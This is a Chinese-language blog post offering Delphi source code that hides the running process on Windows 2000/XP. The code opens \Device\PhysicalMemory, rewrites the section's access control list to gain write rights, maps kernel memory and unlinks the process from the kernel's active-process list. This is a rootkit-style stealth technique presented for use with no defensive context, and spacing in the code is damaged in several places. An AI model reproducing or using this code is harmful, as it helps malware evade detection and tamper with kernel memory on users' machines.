Delphi隐藏进程

网上de坏人
2020-08-27
  1. interface
  3. functionMyHideProcess: Boolean;
  5. implementation
  7. uses
  8. Windows,
  9. Classes, AclAPI, accCtrl;
  11. type
  12. NTSTATUS = LongInt;
  14. const
  15. //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
  16. STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
  17. STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
  18. OBJ_INHERIT = $00000002;
  19. OBJ_PERMANENT = $00000010;
  20. OBJ_EXCLUSIVE = $00000020;
  21. OBJ_CASE_INSENSITIVE = $00000040;
  22. OBJ_OPENIF = $00000080;
  23. OBJ_OPENLINK = $00000100;
  24. OBJ_KERNEL_HANDLE = $00000200;
  25. OBJ_VALID_ATTRIBUTES = $000003F2;
  27. type
  28. PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
  29. IO_STATUS_BLOCK = record
  30. Status: NTSTATUS;
  31. FObject: DWORD;
  32. end;
  34. PUNICODE_STRING = ^UNICODE_STRING;
  35. UNICODE_STRING = record
  36. Length: Word;
  37. MaximumLength: Word;
  38. Buffer: PWideChar;
  39. end;
  41. POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
  42. OBJECT_ATTRIBUTES = record
  43. Length: DWORD;
  44. RootDirectory: Pointer;
  45. ObjectName: PUNICODE_STRING;
  46. Attributes: DWORD;
  47. SecurityDescriptor: Pointer;
  48. SecurityQualityOfService: Pointer;
  49. end;
  51. TZwOpenSection = function(SectionHandle: PHandle;
  52. DesiredAccess: ACCESS_MASK;
  53. ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
  54. TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
  55. SourceString: PWideChar); stdcall;
  57. var
  58. RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
  59. ZwOpenSection: TZwOpenSection = nil;
  60. g_hNtDLL: THandle = 0;
  61. g_pMapPhysicalMemory: Pointer = nil;
  62. g_hMPM: THandle = 0;
  63. g_hMPM2: THandle = 0;
  64. g_osvi: OSVERSIONINFO;
  65. b_hide: Boolean = false;
  66. //---------------------------------------------------------------------------
  68. functionInitNTDLL: Boolean;
  69. begin
  70. g_hNtDLL := LoadLibrary('ntdll.dll');
  72. if0 = g_hNtDLL then
  73. begin
  74. Result := false;
  75. Exit;
  76. end;
  78. RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
  79. ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');
  81. Result := True;
  82. end;
  83. //---------------------------------------------------------------------------
  85. procedureCloseNTDLL;
  86. begin
  87. if (0 <> g_hNtDLL) then
  88. FreeLibrary(g_hNtDLL);
  89. g_hNtDLL := 0;
  90. end;
  91. //---------------------------------------------------------------------------
  93. procedureSetPhyscialMemorySectionCanBeWrited(hSection: THandle);
  94. var
  95. pDacl: PACL;
  96. pSD: PPSECURITY_DESCRIPTOR;
  97. pNewDacl: PACL;
  98. dwRes: DWORD;
  99. ea: EXPLICIT_ACCESS;
  100. begin
  101. pDacl := nil;
  102. pSD := nil;
  103. pNewDacl := nil;
  105. dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);
  107. if ERROR_SUCCESS <> dwRes then
  108. begin
  109. if Assigned(pSD) then
  110. LocalFree(Hlocal(pSD^));
  111. if Assigned(pNewDacl) then
  112. LocalFree(HLocal(pNewDacl));
  113. end;
  115. ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
  116. ea.grfAccessPermissions := SECTION_MAP_WRITE;
  117. ea.grfAccessMode := GRANT_ACCESS;
  118. ea.grfInheritance := NO_INHERITANCE;
  119. ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
  120. ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
  121. ea.Trustee.ptstrName := 'CURRENT_USER';
  123. dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);
  125. if ERROR_SUCCESS <> dwRes then
  126. begin
  127. if Assigned(pSD) then
  128. LocalFree(Hlocal(pSD^));
  129. if Assigned(pNewDacl) then
  130. LocalFree(HLocal(pNewDacl));
  131. end;
  133. dwRes := SetSecurityInfo
  134. (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);
  136. if ERROR_SUCCESS <> dwRes then
  137. begin
  138. if Assigned(pSD) then
  139. LocalFree(Hlocal(pSD^));
  140. if Assigned(pNewDacl) then
  141. LocalFree(HLocal(pNewDacl));
  142. end;
  144. end;
  145. //---------------------------------------------------------------------------
  147. functionOpenPhysicalMemory: THandle;
  148. var
  149. status: NTSTATUS;
  150. physmemString: UNICODE_STRING;
  151. attributes: OBJECT_ATTRIBUTES;
  152. PhyDirectory: DWORD;
  153. begin
  154. g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
  155. GetVersionEx(g_osvi);
  157. if (5 <> g_osvi.dwMajorVersion) then
  158. begin
  159. Result := 0;
  160. Exit;
  161. end;
  163. case g_osvi.dwMinorVersion of
  164. 0: PhyDirectory := $30000;
  165. 1: PhyDirectory := $39000;
  166. else
  167. begin
  168. Result := 0;
  169. Exit;
  170. end;
  171. end;
  173. RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');
  175. attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
  176. attributes.RootDirectory := nil;
  177. attributes.ObjectName := @physmemString;
  178. attributes.Attributes := 0;
  179. attributes.SecurityDescriptor := nil;
  180. attributes.SecurityQualityOfService := nil;
  182. status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  184. if (status = STATUS_ACCESS_DENIED) then
  185. begin
  186. ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
  187. SetPhyscialMemorySectionCanBeWrited(g_hMPM);
  188. CloseHandle(g_hMPM);
  190. status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  191. end;
  193. ifnot (LongInt(status) >= 0) then
  194. begin
  195. Result := 0;
  196. Exit;
  197. end;
  199. g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
  200. FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);
  202. if (g_pMapPhysicalMemory = nil) then
  203. begin
  204. Result := 0;
  205. Exit;
  206. end;
  208. Result := g_hMPM;
  209. end;
  210. //---------------------------------------------------------------------------
  212. functionLinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
  213. var
  214. VAddr, PGDE, PTE, PAddr, tmp: DWORD;
  215. begin
  216. VAddr := DWORD(addr);
  217. // PGDE := BaseAddress[VAddr shr 22];
  218. PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr22) * SizeOf(ULONG))^; // modify by dot.
  220. if0 = (PGDE and1) then
  221. begin
  222. Result := nil;
  223. Exit;
  224. end;
  226. tmp := PGDE and$00000080;
  228. if (0 <> tmp) then
  229. begin
  230. PAddr := (PGDE and$FFC00000) + (VAddr and$003FFFFF);
  231. end
  232. else
  233. begin
  234. PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and$FFFFF000, $1000));
  235. // PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
  236. PTE := PDWORD(PGDE + ((VAddr and$003FF000) shr12) * SizeOf(DWord))^; // modify by dot.
  238. if (0 = (PTE and1)) then
  239. begin
  240. Result := nil;
  241. Exit;
  242. end;
  244. PAddr := (PTE and$FFFFF000) + (VAddr and$00000FFF);
  245. UnmapViewOfFile(Pointer(PGDE));
  246. end;
  248. Result := Pointer(PAddr);
  249. end;
  250. //---------------------------------------------------------------------------
  252. functionGetData(addr: Pointer): DWORD;
  253. var
  254. phys, ret: DWORD;
  255. tmp: PDWORD;
  256. begin
  257. phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  258. tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
  259. phys and$FFFFF000, $1000));
  261. if (nil = tmp) then
  262. begin
  263. Result := 0;
  264. Exit;
  265. end;
  267. // ret := tmp[(phys and $FFF) shr 2];
  268. ret := PDWORD(DWORD(tmp) + ((phys and$FFF) shr2) * SizeOf(DWord))^; // modify by dot.
  269. UnmapViewOfFile(tmp);
  271. Result := ret;
  272. end;
  274. functionSetData(addr: Pointer; data: DWORD): Boolean;
  275. var
  276. phys: DWORD;
  277. tmp: PDWORD;
  278. begin
  279. phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  280. tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and$FFFFF000, $1000));
  282. if (nil = tmp) then
  283. begin
  284. Result := false;
  285. Exit;
  286. end;
  288. // tmp[(phys and $FFF) shr 2] := data;
  289. PDWORD(DWORD(tmp) + ((phys and$FFF) shr2) * SizeOf(DWord))^ := data; // modify by dot.
  290. UnmapViewOfFile(tmp);
  292. Result := TRUE;
  293. end;
  294. //---------------------------------------------------------------------------
  295. {long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
  296. begin
  297. ExitProcess(0);
  298. return 1 ;
  299. end }
  300. //---------------------------------------------------------------------------
  302. functionYHideProcess: Boolean;
  303. var
  304. thread, process: DWORD;
  305. fw, bw: DWORD;
  306. begin
  307. // SetUnhandledExceptionFilter(exeception);
  308. if (FALSE = InitNTDLL) then
  309. begin
  310. Result := FALSE;
  311. Exit;
  312. end;
  314. if (0 = OpenPhysicalMemory) then
  315. begin
  316. Result := FALSE;
  317. Exit;
  318. end;
  320. thread := GetData(Pointer($FFDFF124)); //kteb
  321. process := GetData(Pointer(thread + $44)); //kpeb
  323. if (0 = g_osvi.dwMinorVersion) then
  324. begin
  325. fw := GetData(Pointer(process + $A0));
  326. bw := GetData(Pointer(process + $A4));
  328. SetData(Pointer(fw + 4), bw);
  329. SetData(Pointer(bw), fw);
  331. Result := TRUE;
  332. end
  333. elseif (1 = g_osvi.dwMinorVersion) then
  334. begin
  335. fw := GetData(Pointer(process + $88));
  336. bw := GetData(Pointer(process + $8C));
  338. SetData(Pointer(fw + 4), bw);
  339. SetData(Pointer(bw), fw);
  341. Result := TRUE;
  342. end
  343. else
  344. begin
  345. Result := False;
  346. end;
  348. CloseHandle(g_hMPM);
  349. CloseNTDLL;
  350. end;
  352. functionMyHideProcess: Boolean;
  353. begin
  354. ifnot b_hide then
  355. begin
  356. b_hide := YHideProcess;
  357. end;
  359. Result := b_hide;
  360. end;
  362. end.


最新资讯
阅读62